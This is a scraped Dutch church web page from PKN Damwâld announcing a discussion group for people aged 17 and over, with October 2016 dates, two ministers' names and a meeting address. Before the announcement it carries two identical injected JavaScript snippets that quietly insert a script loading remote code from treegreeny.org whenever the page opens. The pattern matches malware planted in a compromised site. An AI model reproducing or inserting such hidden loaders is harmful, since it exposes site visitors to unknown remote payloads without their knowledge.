;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 17 + kring - PKN Damwâld
10 oktober 2016
20:00 t/m 21:00
't Skûlplak
17 + kringBen je 17 jaar of ouder ? Welkom bij de 17+ kring

Ben je 17 jaar of ouder ? Dan ben je welkom bij de 17+ gespreksgroep. We gaan in gesprek met elkaar n.a.v. het verhaal van God en de mensen, Bijbelgedeelten, andere teksten, stellingen, vragen en filmpjes.

Er zijn in principe twee groepen: een op maandag om half acht in ’t Skûlplak met ds. Timmer en een op vrijdagavond om half acht thuis bij ds. Boukes. Allerlei thema’s uit het christelijk geloof komen aan de orde. Daarbij gaat het niet alleen om het opdoen van kennis (al is wat kennis nooit weg), maar ook om meningsvorming. Wij vinden het beiden heel boeiend om met jullie in gesprek te zijn. De precieze data die in oktober gepland zijn, zijn: maandag 10 en 24 oktober, of vrijdag 14 en 28 oktober. We hebben er zin in!

Ds. S. Boukes en ds. G. Timmer

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld